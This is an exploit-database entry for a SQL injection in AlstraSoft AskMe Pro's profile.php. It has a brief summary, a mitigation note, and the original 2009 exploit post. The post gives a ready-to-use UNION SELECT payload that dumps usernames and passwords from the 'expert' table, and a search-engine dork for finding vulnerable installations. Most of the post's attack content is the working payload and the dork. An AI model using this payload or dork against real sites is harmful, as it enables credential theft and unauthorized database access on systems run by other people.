AlstraSoft AskMe Pro ( profile.php?id ) SQL Injection Vulnerability

vendor:

AskMe Pro

by:

CoBRa_21

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: AskMe Pro

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

AlstraSoft AskMe Pro ( profile.php?id ) SQL Injection Vulnerability

A vulnerability exists in AlstraSoft AskMe Pro, which allows an attacker to inject malicious SQL commands into the profile.php?id parameter. This can be exploited to gain access to the database and potentially disclose sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use the least privileged account with access to the database.

Source

Exploit-DB raw data:

########################################################################################
AlstraSoft AskMe Pro ( profile.php?id ) SQL Injection Vulnerability 
########################################################################################

Author : CoBRa_21
Author Web Page : null [ I've sold my website (ipbul.org) ]
Dork : inurl:forum_answer.php?que_id
Script Page : http://www.alstrasoft.com/

########################################################################################
 
Sql Injection :

http://localhost/[path]/profile.php?id=-5 union select 0,group_concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from+expert

########################################################################################
Thanks cyber-warrior.org  &  e-banka.org & AKINCILAR & ipbul.org
########################################################################################